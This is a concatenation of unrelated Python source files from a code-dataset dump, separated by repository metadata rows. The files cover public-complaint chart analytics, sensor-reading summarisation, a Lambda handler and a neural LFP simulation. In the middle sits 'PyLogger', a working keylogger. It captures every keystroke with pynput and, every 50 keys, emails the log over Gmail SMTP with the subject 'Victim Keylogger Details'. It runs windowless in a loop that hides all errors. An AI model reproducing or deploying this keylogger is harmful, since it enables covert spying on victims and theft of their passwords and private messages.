                        if a in data.message.tolist()[i]:
                            last_area = a
                            break
                    else:
                        continue
                    break
        dic1 = {"chushimowei": [{"first_time": first_time.split(" ")[0]}, {"first_area": first_area},
                                {"last_time": last_time.split(" ")[0]}, {"last_area": last_area}]}
        # Outbreak month and how many articles it produced.
        year_month = data.year_day.map(lambda x: x[0:7])
        year_month = pd.DataFrame(year_month)
        tong_ji = year_month.groupby("year_day").size()
        sort_tong_ji = tong_ji.sort_values(ascending=False)  # months sorted by volume, busiest first
        break_time = sort_tong_ji.index[0]  # the outbreak month
        message = sort_tong_ji.values[0]  # article count for that month
        dic2 = {"shijianbaofa": [{"baofayuefen": break_time}, {"wenzhangshuliang": str(message)}]}
        # Report statistics per request type.
        problem = data.groupby("problem_type").size().sort_values(ascending=False)  # sorted problem types
        z_l = ["我要咨询", "其他", "我要投诉", "我要求助", "我要举报", "我要建议"]
        for i in z_l:
            if i not in problem.index:
                problem[i] = 0
        dic3 = {"baodaotongji": [{"zixun": str(problem["我要咨询"])}, {"qita": str(problem["其他"])},
                                 {"tousu": str(problem["我要投诉"])},
                                 {"qiuzhu": str(problem["我要求助"])}, {"jubao": str(problem["我要举报"])},
                                 {"jianyi": str(problem["我要建议"])}]}
        # Monthly intake distribution (line chart).
        index = tong_ji.index.tolist()
        values = tong_ji.values.tolist()
        dic4 = {"shijianjieshou_zhexiantu": [{"xAxis": index, "series": values}]}
        # Distribution of replying units (funnel chart).
        reply = data.groupby("receiveunitname").size().sort_values(ascending=False)
        if "暂无接收单位" in reply.index:
            reply = reply.drop("暂无接收单位")
        reply = reply[reply.values > 1]
        r = []
        for i in range(len(reply)):
            dic = {"value": str(reply.values[i]), "name": reply.index[i]}  # one funnel entry per unit
            r.append(dic)
        dic5 = {"shijiandafudanwei_loudoutu": [{"max": reply.values.tolist()[0]}, {"data": r}]}
        # Distribution of problem categories (pie chart).
        p = []
        for i in range(len(problem)):
            if problem.values[i] != 0:
                dic = {"value": str(problem.values[i]), "name": problem.index[i]}
                p.append(dic)
        dic6 = {"shijianzhonglei_bingtu": p}
        dic = {"jianyaofenxi": [dic1, dic2, dic3, dic4, dic5, dic6]}
        return dic

    def bin_tu(self):
        """Pie chart of reporting channels (the 'method' column)."""
        data = self.data
        data = data.groupby("method").size().sort_values(ascending=False)
        if "NULL" in data.index:
            data = data.drop("NULL")
        m = []
        for i in range(len(data)):
            dic = {"value": str(data.values[i]), "name": data.index[i]}
            m.append(dic)
        dic = {"shijianbaodao_bingtu": m}
        return dic

    def influence(self):  # event-impact analysis, backed by an LDA topic model
        """Bar chart of the dominant LDA topics across matching messages."""
        global zhu_ti
        all_zt = ["房屋安置", "修建工程", "孩子学校", "工作工资", "居民户口", "交通", "物业维修", "城市发展", "医疗保险", "公司经营", "补贴政策"]
        lda = models.LdaModel.load("./主题分类")
        data = self.data
        data1 = pd.read_pickle("content.pickle")
        data2 = [data for data in data1["contents_clean"]]
        dictionary = corpora.Dictionary(data2)
        stopwords = pd.read_csv("tyc.csv")
        stopwords = stopwords["word"].tolist()
        w = []
        for i in data["message"].tolist():
            seg_word = [w for w in jieba.cut(i, cut_all=False) if len(w) > 1 and w not in stopwords]
            bow = dictionary.doc2bow(seg_word)  # feed the tokenized message to the model
            a = lda.get_document_topics(bow)
            b = [i[1] for i in a]
            b.sort(reverse=True)
            # Keep the topic with the highest probability for this message.
            for z in a:
                if b[0] == z[1]:
                    zhu_ti = z[0]
            w.append(all_zt[zhu_ti])
        w = pd.Series(w)
        w = w.value_counts()
        if len(w) > 10:
            dic = {"shijianyingxiang_zhuxingtu": [{"xAxis": {"type": 'category', "data": w.index.tolist()[0:10]}},
                                                  {"series": [{"name": "影响主题", "data": w.values.tolist()[0:10],
                                                               "type": 'bar'}]}]}
        else:
            dic = {"shijianyingxiang_zhuxingtu": [{"xAxis": {"type": 'category', "data": w.index.tolist()}},
                                                  {"series": [{"name": "影响主题", "data": w.values.tolist(),
                                                               "type": 'bar'}]}]}
        return dic

    def attention(self):  # public-attention analysis
        """Gauge chart: share of the outbreak month's records that match."""
        data = self.data
        data = data.year_day.map(lambda x: x.split(" ")[0][0:7])
        data = data.value_counts()
        break_time = data.index.tolist()[0]
        message1 = data[break_time]
        conn = self.conn
        # SECURITY FIX: bind the month prefix instead of formatting it into SQL.
        sql = 'select * from bottom_car where year_day like %s'
        sql2 = 'select * from shizhang where year_day like %s'
        month_pattern = f"{break_time}%"
        data1 = pd.read_sql(sql, conn, params=(month_pattern,))
        data2 = pd.read_sql(sql2, conn, params=(month_pattern,))
        data3 = pd.concat([data1, data2], axis=0)
        a = int(message1) / len(data3) + 0.25
        a = ("%.2f" % a)
        tu_data = [{"value": a, "name": "程度分析"}]  # data entry for the gauge chart
        dic = {"yibiaotu": {"data": tu_data}}
        return dic

    def reply(self):  # government feedback reporting
        """Summaries of how long the authorities took to reply."""
        data = self.data
        data['year_day'] = data['year_day'].apply(lambda x: x.replace(".", "-").split(" ")[0])
        data['replyDate'] = data['replyDate'].apply(lambda x: x.replace(".", "-").split(" ")[0])
        data["xiangcha"] = data["replyDate"].apply(pd.to_datetime) - data["year_day"].apply(pd.to_datetime)  # reply delay
        data["xiangcha"] = data["xiangcha"].apply(lambda x: int(x.days))
        data = data[data["xiangcha"] >= 0]
        date = data["xiangcha"].sort_values(ascending=False)
        mean_date = str(int(date.mean())) + "天"
        long_date = str(date.values.tolist()[0]) + "天"
        short_date = str(date.values.tolist()[-1]) + "天"
        if short_date == "0天":
            short_date = "当天"
        dic1 = {"wengzixinxi": [{"chulishijian": [{"short_date": short_date}, {"long_date": long_date},
                                                  {"mean_date": mean_date}]}, {"manyidu": "100%"}]}
        data1 = data.groupby("xiangcha").size()
        data1.index = data1.index.map(lambda x: str(x) + "天")  # a standalone Series index needs .map
        if len(data1) > 15:
            dic2 = {"time_zhuxingtu": [{"yAxis": {"type": 'category', "data": data1.index.tolist()[0:15]}},
                                       {"series": [{"name": "受理时间", "type": "bar",
                                                    "data": data1.values.tolist()[0:15]}]}]}
        else:
            dic2 = {"time_zhuxingtu": [{"yAxis": {"type": 'category', "data": data1.index.tolist()}},
                                       {"series": [
                                           {"name": "受理时间", "type": "bar", "data": data1.values.tolist()}]}]}
        data = data.copy()
        data["xiangcha"] = data["xiangcha"].apply(lambda x: str(x) + "天")
        data = data.groupby("xiangcha").size().sort_values(ascending=False)
        m = []
        for i in range(len(data)):
            if i < 13:
                dic = {"value": str(data.values[i]), "name": data.index[i]}
                m.append(dic)
        dic3 = {"time_bingtu": m}
        dic = {"zhengfufankui": [dic1, dic2, dic3]}
        return dic
def _load_error_response():
    """Load the canned "not enough data" JSON payload from disk.

    BUGFIX: the original called json.loads("templates/yiqing_error.json"),
    which tries to parse the *path string* as JSON and always raises.
    """
    with open("templates/yiqing_error.json", encoding="utf-8") as f:
        return json.load(f)


def cha_xun(keyword1):
    """Run every chart builder of Picture for *keyword1* and assemble the
    combined payload; falls back to the canned error payload when the
    keyword matched too few records or the first builder failed."""
    shi_jiang = Picture(keyword1)
    # Bail out when the keyword matched too few rows to chart.
    if shi_jiang.__dict__ == {} or shi_jiang.number < 5:
        print("查询信息太少!")
        return _load_error_response()
    s = [shi_jiang.time_area, shi_jiang.bin_tu, shi_jiang.influence, shi_jiang.attention, shi_jiang.reply]

    class MyThread(threading.Thread):
        """Thread wrapper that keeps its target's return value."""

        def __init__(self, func, args=()):
            super(MyThread, self).__init__()
            self.func = func
            self.args = args

        def run(self):
            self.result = self.func(*self.args)

        def get_result(self):
            threading.Thread.join(self)
            try:
                return self.result
            except Exception:
                # run() raised, so self.result was never set.
                return None

    c = []
    for i in s:
        a = MyThread(i)
        a.start()
        # NOTE: joining immediately makes the builders run sequentially.
        a.join()
        b = a.get_result()
        c.append(b)
    c.append(keyword1)
    dic = {"yuqingzhuizong": c}
    if dic["yuqingzhuizong"][0] is None:
        return _load_error_response()
    else:
        return dic
# cha_xun("公司") # 查询,传入关键字
| [
"3401506758@qq.com"
] | 3401506758@qq.com |
fb386bc0046e6b348676175c3c9cad5f9f92f63e | 662070fcb928aaee6404cce5d6b9f4560400f175 | /classification_algorithm/src/continuous_transformer.py | 8b26d4da2bb90063b6824c4ee7d58458a6f19987 | [
"Apache-2.0"
] | permissive | PMantovani/road-irregularity-detector | 134bcd45be625bc5cf4d564acdd1d695444f49c9 | 6df3bd517c403896f223b0e721eee25a610d9693 | refs/heads/master | 2021-08-17T11:55:13.309856 | 2018-10-31T01:35:42 | 2018-10-31T01:35:42 | 105,797,706 | 0 | 0 | Apache-2.0 | 2018-10-25T00:38:33 | 2017-10-04T17:33:02 | Python | UTF-8 | Python | false | false | 4,775 | py | import numpy as np
import math
'''Transforms individual readings into continuous ones'''
class ContinuousTransformer(object):
    """Groups individual sensor readings into continuous runs.

    Readings are accumulated while they share the same road-status label
    and look plausible (speed / latitude / longitude in range). Once a run
    spans at least 10 seconds it is summarized (per-channel mean and
    variance plus start/end coordinates) into one row of summary_array.
    """

    def __init__(self):
        self.axis_independent = False  # collapse x/y/z into magnitudes when True
        self.quality = 0               # road-status label of the run being built
        self.summary_array = []        # one summarized row per completed run
        self.max_means = [0] * 7       # kept for interface compatibility (normalization removed)
        self.max_variances = [0] * 7   # kept for interface compatibility
        self.continuous_readings = []  # readings of the run under construction
        self.start_time = 0            # timestamp of the run's first reading
        self.times_called = 0          # total add_reading() invocations (debug aid)

    def set_axis_independent(self, axis_independent):
        """Choose whether readings keep separate axes or magnitudes only."""
        self.axis_independent = axis_independent

    def add_reading(self, individual_reading):
        """Feed one raw reading (sequence of >= 11 string fields) into the run.

        Malformed or implausible readings reset the current run. When the
        run reaches 10 seconds it is summarized into summary_array.
        """
        self.times_called += 1
        if len(individual_reading) < 11:
            self.__reset_continuous()
            return
        try:
            road_status = int(individual_reading[0])
            acc_x = float(individual_reading[1])
            acc_y = float(individual_reading[2])
            acc_z = float(individual_reading[3])
            gyr_x = float(individual_reading[4])
            gyr_y = float(individual_reading[5])
            gyr_z = float(individual_reading[6])
            lat = float(individual_reading[7])
            lng = float(individual_reading[8])
            speed = float(individual_reading[9])
            curr_time = float(individual_reading[10])
        except ValueError:
            # BUGFIX: report the bad reading and drop the current run instead
            # of falling through with undefined locals (NameError).
            print(self.times_called)
            self.__reset_continuous()
            return
        if not self.continuous_readings:
            # First reading of a new run fixes its label and start time.
            self.quality = road_status
            self.start_time = curr_time
        # Discard the run on a label change or an implausible GPS/speed value.
        if (road_status != self.quality or speed > 200 or speed < 15 or
                lat > 90 or lat < -90 or lng > 180 or lng < -180):
            self.__reset_continuous()
            return
        if self.axis_independent:
            acc = math.sqrt(acc_x**2 + acc_y**2 + acc_z**2)
            gyr = math.sqrt(gyr_x**2 + gyr_y**2 + gyr_z**2)
            self.continuous_readings.append([road_status, acc, gyr, lat, lng, speed, curr_time])
        else:
            self.continuous_readings.append([road_status, acc_x, acc_y, acc_z, gyr_x,
                                             gyr_y, gyr_z, lat, lng, speed, curr_time])
        if curr_time - self.start_time >= 10:
            self.__insert_to_summary_array()

    def get_summary_array(self):
        """Return the rows summarized so far.

        (An earlier max-based normalization pass was disabled; the raw
        mean/variance rows are returned as-is.)
        """
        return self.summary_array

    def __reset_continuous(self):
        """Discard the run under construction."""
        self.quality = 0
        self.continuous_readings = []

    def __insert_to_summary_array(self):
        """Summarize the current run into one row and start a new run.

        Row layout (axis-dependent mode): label mean, then mean/variance
        pairs for acc x/y/z, gyr x/y/z and speed, then start lat/lng,
        end lat/lng and the end timestamp.
        """
        np_array = np.array(self.continuous_readings)
        variance = np.var(np_array, axis=0)
        mean = np.mean(np_array, axis=0)
        if self.axis_independent:
            self.summary_array.append(
                [mean[0], mean[1], variance[1], mean[2], variance[2], mean[5], variance[5],
                 self.continuous_readings[0][3], self.continuous_readings[0][4],
                 self.continuous_readings[-1][3],
                 self.continuous_readings[-1][4],
                 self.continuous_readings[-1][5]])
        else:
            self.summary_array.append(
                [mean[0], mean[1], variance[1], mean[2], variance[2], mean[3], variance[3],
                 mean[4], variance[4], mean[5], variance[5], mean[6], variance[6], mean[9], variance[9],
                 self.continuous_readings[0][7], self.continuous_readings[0][8],
                 self.continuous_readings[-1][7],
                 self.continuous_readings[-1][8],
                 self.continuous_readings[-1][10]])
        self.__reset_continuous()
| [
"pmantovani94@gmail.com"
] | pmantovani94@gmail.com |
fdc19d0a4f81488f5c242f4dfcda161c70c25497 | a8d3471d8d2fa914a0f8bab0495b115e70538430 | /handler.py | 86e8d3670ac9432144feb56e01bd3d420ea7f28b | [] | no_license | davidbegin/morguebot | a03bbfa46cbfd6b916ace98a2f476e44d4843349 | f62d75917d13b4a443c0f3c8e00f7dd82720d9f3 | refs/heads/master | 2022-12-22T14:52:20.398139 | 2020-01-17T15:56:04 | 2020-01-17T15:56:04 | 213,519,437 | 8 | 0 | null | 2022-12-08T06:49:48 | 2019-10-08T01:16:15 | Python | UTF-8 | Python | false | false | 529 | py | import json
import os
from glm.generic_lambda_handler import lambda_handler as generic_lambda_handler
from flask_app import app
import xl_bot
import dungeon_gossiper
def async_handler(messages, context):
    """Asynchronous message entry point: currently only echoes the payload to stdout."""
    print(messages)
def lambda_handler(event, context):
    """AWS Lambda entry point: delegate to the generic Flask-backed handler and echo its result."""
    banner = "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
    response = generic_lambda_handler(
        event=event, context=context, flask_app=app, async_handler=async_handler
    )
    print(banner)
    print(f"{response}")
    print(banner)
    return response
| [
"davidmichaelbe@gmail.com"
] | davidmichaelbe@gmail.com |
d8f581f9755f052824c1e8e44b7e583598774331 | 60d6313b82d507533f297fb6dfbd0b765467f143 | /PyLogger- Python KeyLogger.pyw | e7cb564281ee27b7bf02dc103a98b3771dff5aad | [] | no_license | aravindmyd/PyLogger | c26937ef5c1977b9381b872db1e7fa1d47518328 | 973b6bdaa759352a9b66427202e426e542f2730e | refs/heads/master | 2020-04-17T17:06:42.221833 | 2019-01-21T08:42:13 | 2019-01-21T08:42:13 | 166,769,909 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,499 | pyw | from pynput.keyboard import Listener
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import datetime
while True:
try:
lst = []
def email_it():
user_name = "" #Your Email address [ Sender E-mail] example@gmail.com
password = "" #Sender E-mail password
to_add = "" #Receiver E-mail address receiver@gmail.com
subject = str(datetime.datetime.today()) + "Victim Keylogger Details " #Customize Your E-mail Subject
message = ''
for i in lst:
message = message + i
sss = MIMEMultipart()
sss['From'] = user_name
sss['To'] = to_add
sss['Subject'] = subject
sss.attach(MIMEText(message, 'plain'))
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(user_name, password)
mgs = sss.as_string()
s.sendmail(user_name, to_add, mgs)
s.quit()
def write_to_list(key):
lst_key = str(key)
lst_key = lst_key.replace("'", "")
lst_key = key_code(lst_key)
lst.append(lst_key)
if len(lst) > 50: #It will send you the E-mail once the victim typed 50 keys. Change according to your Limit.
email_it()
lst.clear()
def key_code(letter): # Add as much key as possible. It makes your E-mail to look clean.
if letter == "Key.space":
return " "
if letter == "Key.shift":
return " [SHFT]"
if letter == "Key.ctrl_r":
return "[CTRL] "
if letter == "Key.enter":
return " [ENTER]"
if letter == "K ey.shift_r":
return "[SHFT]"
if letter == "Key.alt_l":
return "[ALT]"
if letter == "Key.backspace":
return "[BCKSP]"
if letter == "Key.ctrl_l":
return "[CTRL]"
if letter == "Key.ctrl_la":
return "[CTRL]"
if letter == "Key.tab":
return "[TAB]"
if letter == "Key.end":
return "[END]"
else:
return letter
with Listener(on_press=write_to_list) as lis:
lis.join()
except:
pass
| [
"noreply@github.com"
] | noreply@github.com |
5bc5841704b7e76662407f28703031472021dcc5 | c5b40793ae9ec944df54c2544dc4e2b4ecafa51d | /Data structure/Array/Program for Mean and median of an unsorted array using quickselect().py | 8be31a6cfee382a0f7bceeddd31a9ecfa697d0ce | [] | no_license | AjaykumarGP/MyDataStructures_SolvedProblems | ed77cad83450805fa977947dd7a34600cd397e8c | ade6f8e8404946e02be087a7c44277559312babf | refs/heads/main | 2023-05-04T21:16:42.068499 | 2021-05-29T13:53:10 | 2021-05-29T13:53:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,912 | py |
import random
#Program for Mean and median of an unsorted array using quickselect()
class MedianExtractor():
    """Find the median of an unsorted list with quickselect over a randomised
    Lomuto-style partition (expected O(n), no full sort needed)."""

    def __init__(self):
        # Working copy of the data; partitioning mutates it in place.
        self.array = []

    def shufflePivotIndex(self, low, high):
        """Swap a randomly chosen element of array[low:high] into slot `high`.

        Randomising the pivot keeps the expected quickselect cost linear even
        on already-sorted or adversarial input.
        """
        if low < high:
            pivot = random.randrange(low, high)
            self.array[pivot], self.array[high] = self.array[high], self.array[pivot]

    def lomutoPartition(self, low, high):
        """Partition array[low..high] around a random pivot; return its final index.

        Elements greater than the pivot end up to its right, the rest to its
        left. Uses a rotation scheme: the pivot starts at `high` and drifts
        left one slot each time a larger element is moved behind it.
        """
        self.shufflePivotIndex(low, high)
        pivotIndex = high
        trackingIndex = low
        for _ in range(low, high + 1):
            if self.array[trackingIndex] > self.array[pivotIndex]:
                # Rotate: tracked element jumps behind the pivot,
                # the pivot shifts one slot to the left.
                temp = self.array[trackingIndex]
                self.array[trackingIndex] = self.array[pivotIndex - 1]
                self.array[pivotIndex - 1] = self.array[pivotIndex]
                self.array[pivotIndex] = temp
                pivotIndex -= 1
            else:
                trackingIndex += 1
        return pivotIndex

    def quickselect(self, low, high, medianIndex):
        """Return the element that would sit at 0-based `medianIndex` in sorted
        order, or None if the search range is empty."""
        if low <= high:
            mid = self.lomutoPartition(low, high)
            # Removed the leftover debug print(mid, medianIndex) from here.
            if mid == medianIndex:
                return self.array[mid]
            if mid > medianIndex:
                return self.quickselect(low, mid - 1, medianIndex)
            return self.quickselect(mid + 1, high, medianIndex)
        return None

    def getMedian(self, array):
        """Return the 1-based rank of the median element of `array`."""
        return (len(array) + 1) // 2

    def copyArray(self, array):
        """Load a defensive copy of `array` so quickselect can mutate freely."""
        self.array = array.copy()
# Demo: find the median of a 15-element unsorted list without sorting it.
array = [1, 3, 5, 2, 6, 6, 8, 7, 9, 10, 11, 13, 14, 15, 16]
heapObj = MedianExtractor()
# getMedian returns the 1-based rank of the median (8 for 15 elements).
medianIndex = heapObj.getMedian(array)
heapObj.copyArray(array)
print("median index", medianIndex)
# quickselect expects 0-based indices, hence medianIndex - 1.
median = heapObj.quickselect( 0, len(array)-1, medianIndex-1)
print("Median of the given array")
print(median)
| [
"noreply@github.com"
] | noreply@github.com |
b429309f8e623409f989dca83d4ff8711914cc70 | 1b1546cafc9453c4fdb9406533f94ed56206541c | /tests/tutorials/tour/test_decoupled.py | 1ca8a8aa8e194c9366c33e5da2f143cb4331d61d | [
"MIT"
] | permissive | pauleveritt/wired | bad7ecadae4f23874598031ae8d17e08ba34ec9b | 629f950176a9682a7ccb68efbb27cb2e23b4e93e | refs/heads/master | 2020-05-01T06:38:38.728436 | 2019-04-29T12:43:43 | 2019-04-29T12:43:43 | 177,335,238 | 1 | 1 | MIT | 2019-04-23T00:14:34 | 2019-03-23T20:08:57 | Python | UTF-8 | Python | false | false | 1,029 | py | import pytest
from wired import ServiceRegistry
@pytest.fixture
def settings():
    """Registry settings shared by the tour tests."""
    from tutorials.tour.decoupled import Settings
    return Settings(punctuation='!!')
@pytest.fixture
def registry(settings):
    """A wired ServiceRegistry built from the shared settings fixture."""
    from tutorials.tour.decoupled import setup
    return setup(settings)
@pytest.fixture
def default_customer():
    """A plain (non-French) customer."""
    from tutorials.tour.decoupled import Customer
    mary = Customer(name='Mary')
    return mary
@pytest.fixture
def french_customer():
    """A FrenchCustomer, handled by the customized greeter."""
    from tutorials.tour.decoupled.custom import FrenchCustomer
    henri = FrenchCustomer(name='Henri')
    return henri
def test_greet_customer(registry, default_customer):
    """A plain customer gets the default English greeting with the configured punctuation."""
    from tutorials.tour.decoupled import greet_customer
    greeting = greet_customer(registry, default_customer)
    assert greeting == 'Hello Mary !!'
def test_greet_french_customer(registry, french_customer):
    """A FrenchCustomer gets the French greeting override with the configured punctuation."""
    from tutorials.tour.decoupled import greet_customer
    greeting = greet_customer(registry, french_customer)
    assert greeting == 'Bonjour Henri !!'
| [
"pauleveritt@me.com"
] | pauleveritt@me.com |
1fd85db41dcf8eddff27a33ee5938c6672851025 | 0b8c187f15d4aa440b70a68bd1d6dab233042b06 | /setup.py | e1bbd20aacaa5072a127d0fe05e610444a1121fa | [] | no_license | ZithaChitra/seq2seq_lstms | 0d5af8ef043920da403fe9df6ceebf99037d4203 | 33b49e73475dc98703029465ea7358187e9ac5c7 | refs/heads/master | 2023-04-22T21:01:34.952387 | 2021-05-12T08:33:23 | 2021-05-12T08:33:23 | 362,598,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | from setuptools import setup, find_packages
import pathlib
from os import path

__version__ = "0.1.0"

cwd = pathlib.Path.cwd()

# Read runtime dependencies from requirements.txt: "git+" entries become
# dependency links, everything else a regular install requirement.
with open(path.join(cwd, "requirements.txt"), encoding="utf-8") as f:
    all_reqs = f.read().split("\n")
install_requires = [x.strip() for x in all_reqs if "git+" not in x]
# BUGFIX: was x.strp(), which raised AttributeError for any "git+" requirement.
dependency_links = [x.strip().replace("git+", "") for x in all_reqs if x.startswith("git+")]

setup(
    name="ManyThings",
    version=__version__,
    packages=find_packages(),
    install_requires=install_requires,
    dependency_links=dependency_links,
)
""
] | |
2ee8380fc6a904aebb84b742cacca3669f9f7f0a | aea1d61c9a5d445f3a1c328a757dfa02d652f367 | /dataset_04__eph_stim_vs_dist/fig9b/code/data/results/all_lfps.py | 6880c9a242cd1df2c7015ad340675a073b8c6c85 | [] | no_license | ModelDBRepository/263988 | bb15ddf953a31ca44ac62ead919e3106389374f8 | b1f4bd4931bb1ddcc323108c39e389b9fa4234a0 | refs/heads/master | 2022-11-21T22:38:24.738870 | 2020-07-30T00:38:17 | 2020-07-30T00:38:17 | 283,632,019 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,650 | py | """
Miguel Capllonch Juan
30 September 2018
Draw together all the LFPs computed with the different methods:
- Results from the simulations (RN model)
- Using the VC conductor theory
"""
import numpy as np
import matplotlib.pyplot as plt
import csv
# Recording electrodes
# Four point electrodes at the cardinal positions (E/S/W/N) around the nerve,
# all at z = 19000 um. Each entry holds per-fiber ('lfp_indiv_*') and summed
# ('lfp_total_*') LFP buffers for two current layers, plus a plot color.
rec_els = {
	'E': {'pos': (250, 0, 19000),
		'lfp_indiv_ly1': {}, 'lfp_indiv_ly2': {},
		'lfp_total_ly1': None, 'lfp_total_ly2': None,
		'color': 'r'},
	'S': {'pos': (0, -250, 19000),
		'lfp_indiv_ly1': {}, 'lfp_indiv_ly2': {},
		'lfp_total_ly1': None, 'lfp_total_ly2': None,
		'color': 'g'},
	'W': {'pos': (-250, 0, 19000),
		'lfp_indiv_ly1': {}, 'lfp_indiv_ly2': {},
		'lfp_total_ly1': None, 'lfp_total_ly2': None,
		'color': 'b'},
	'N': {'pos': (0, 250, 19000),
		'lfp_indiv_ly1': {}, 'lfp_indiv_ly2': {},
		'lfp_total_ly1': None, 'lfp_total_ly2': None,
		'color': 'k'}
	}
# Stimulating electrode (amp in mA)
# Rectangular pulse: starts at `delay` ms, lasts `dur` ms, amplitude `amp`.
delay = 0.1
dur = 0.2
amp = -15.e-3
stimcurrent = None
stimelpos = (250, 0, 100)
# Medium conductivity tensor (1/(Ohm*um))
# Anisotropic: the longitudinal (z) resistivity differs from the transverse.
sigma_x = 1. / (1.211e3 * 1.e-6)
sigma_y = 1. / (1.211e3 * 1.e-6)
sigma_z = 1. / (0.175e3 * 1.e-6)
# Functions
def compute_lfp(currents, elpos):
	"""Total LFP at point electrode `elpos` from all segment currents.

	`currents` has shape (n_segments, n_timesteps); the segment coordinates
	(module-level x, y, z) and the anisotropic conductivities
	(sigma_x/y/z) enter the point-source equation of Nicholson & Freeman
	(1975).  Returns the LFP time series summed over all segments.
	"""
	dx = x - elpos[0]
	dy = y - elpos[1]
	dz = z - elpos[2]
	denominator = 4. * np.pi * np.sqrt(
		sigma_y * sigma_z * dx ** 2 +
		sigma_z * sigma_x * dy ** 2 +
		sigma_x * sigma_y * dz ** 2
	)
	# Broadcast the per-segment denominator over the time axis.  This is
	# numerically identical to the old repeat(nt).reshape(currents.shape),
	# but no longer relies on the global `nt` matching currents.shape[1].
	return (currents / denominator[:, np.newaxis]).sum(axis=0)
def compute_lfp_fromtimeseries(currents, srcpos, elpos):
	"""LFP at point electrode `elpos` from a single current source at `srcpos`.

	Same Nicholson & Freeman (1975) point-source equation as compute_lfp,
	but for one source only, so the current time series is divided by a
	single scalar denominator.
	"""
	dx = srcpos[0] - elpos[0]
	dy = srcpos[1] - elpos[1]
	dz = srcpos[2] - elpos[2]
	scale = 4. * np.pi * np.sqrt(
		sigma_y * sigma_z * dx ** 2 +
		sigma_z * sigma_x * dy ** 2 +
		sigma_x * sigma_y * dz ** 2
	)
	return currents / scale
# Declare arrays
# Per-fiber containers keyed by fiber index; x/y/z collect one entry per segment.
names = {}
ily1 = {}
ily2 = {}
balancely1 = {}
balancely2 = {}
lfp_indiv_ly1 = {}
lfp_indiv_ly2 = {}
x = []
y = []
z = []
ii_fibs = []
# Other parameters
dt = 0.005
# Get recordings from file
# Reference extracellular recording from the resistor-network (RN) model.
recs = []
# with open('./recordings_R0P0_noartefacts.csv', 'r') as f:
with open('./recordings_R0P0_withartefacts.csv', 'r') as f:
	frl = list(csv.reader(f))
	for row in frl[1:]:
		recs.append(float(row[1]))
recs = np.array(recs)
# Get currents from file
# Each row: fiber index, segment name, x, y, z, then the layer-1 and layer-2
# current time series concatenated back to back.
with open('./membranecurrents.csv', 'r') as f:
	frl = list(csv.reader(f))
	for i, row in enumerate(frl[1:]):
		ifib = int(row[0])
		ii_fibs.append(ifib)
		name = row[1]
		data = row[5:]
		# NOTE(review): len(data) / 2 is float division under Python 3, which
		# would make the slices below raise TypeError -- this script assumes
		# Python 2 semantics; use // if porting.
		ndata = len(data) / 2
		dataly1 = np.array([float(item) for item in data[:ndata]])
		dataly2 = np.array([float(item) for item in data[ndata:]])
		try:
			ily1[ifib].append(dataly1.copy())
			ily2[ifib].append(dataly2.copy())
			names[ifib].append(name)
		except KeyError:
			# First segment seen for this fiber: create its lists.
			names[ifib] = [name]
			ily1[ifib] = [dataly1]
			ily2[ifib] = [dataly2]
		x.append(float(row[2]))
		y.append(float(row[3]))
		z.append(float(row[4]))
# Positions from lists to arrays
x = np.array(x)
y = np.array(y)
z = np.array(z)
# Finish setting parameters that depend on the data
tarray = np.arange(0, dt * ndata, dt)
nt = len(tarray)
nsegstotal = len(z)
# Rectangular stimulation pulse: `amp` between `delay` and `delay + dur`, 0 elsewhere.
stimcurrent = amp * np.ones_like(tarray)
# stimcurrent[np.where(tarray < delay + dur)] = amp
stimcurrent[np.where(tarray < delay)] = 0.
stimcurrent[np.where(tarray > delay + dur)] = 0.
# stimcurrent = stimcurrent()
# stimcurrent[np.where(delay < tarray < delay + dur)] = amp
# Positions of the nodes of Ranvier
zRN = {}
# and indices corresponding to them
# Segments whose name contains 'node' are nodes of Ranvier.
indsRN = {}
for k, v in names.items():
	zRN[k] = []
	indsRN[k] = []
	for i, vv in enumerate(v):
		if 'node' in vv:
			zRN[k].append(z[i])
			indsRN[k].append(i)
for ifib in ii_fibs:
	# Current balances
	# Net membrane current per time step (should be ~0 if currents balance).
	ily1[ifib] = np.array(ily1[ifib])
	ily2[ifib] = np.array(ily2[ifib])
	balancely1[ifib] = np.zeros(nt)
	balancely2[ifib] = np.zeros(nt)
	for i_t, t in enumerate(tarray):
		balancely1[ifib][i_t] = ily1[ifib][:, i_t].sum()
		balancely2[ifib][i_t] = ily2[ifib][:, i_t].sum()
	# Individual LFPs
	for k, re in rec_els.items():
		re['lfp_indiv_ly1'][ifib] = compute_lfp(ily1[ifib], re['pos'])
		re['lfp_indiv_ly2'][ifib] = compute_lfp(ily2[ifib], re['pos'])
# Finally, sum up the individual LFPs of the fibers into a total LFP
# for each electrode
for k, re in rec_els.items():
	re['lfp_total_ly1'] = np.zeros(nt)
	re['lfp_total_ly2'] = np.zeros(nt)
	for ifib in ii_fibs:
		re['lfp_total_ly1'] += re['lfp_indiv_ly1'][ifib]
		re['lfp_total_ly2'] += re['lfp_indiv_ly2'][ifib]
	# Add the contribution of the stimulating electrode
	re['lfp_total_ly1'] += compute_lfp_fromtimeseries(stimcurrent,
		stimelpos, re['pos'])
	re['lfp_total_ly2'] += compute_lfp_fromtimeseries(stimcurrent,
		stimelpos, re['pos'])
# What if I sum them?
# NOTE(review): `re` here is whichever electrode the loop above visited last
# (dict iteration order) -- confirm summing only that electrode is intended.
resum = re['lfp_total_ly1'] + re['lfp_total_ly2']
# Now compare the two curves
# Normalise each trace by its peak-to-peak amplitude for shape comparison.
resum_norm = resum / np.abs(resum.max() - resum.min())
recs_norm = recs / np.abs(recs.max() - recs.min())
###############################################################################
# Figures
# Time evolution at some point
# Figure 1: absolute traces -- RN-model reference, per-electrode VC-model
# totals for both layers, and their sum.
fig, ax = plt.subplots()
ax.plot(tarray, recs, lw=3, label='RN model')
for k, re in rec_els.items():
	ax.plot(tarray, re['lfp_total_ly1'], c=re['color'] , ls='-',
		label=k + '. Layer 1')
	ax.plot(tarray, re['lfp_total_ly2'], c=re['color'] , ls='--',
		label=k + '. Layer 2')
ax.plot(tarray, resum, 'r', lw=3, label='Sum VC model')
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Extracellular recordings (mV)')
ax.set_title('Extracellular recordings')
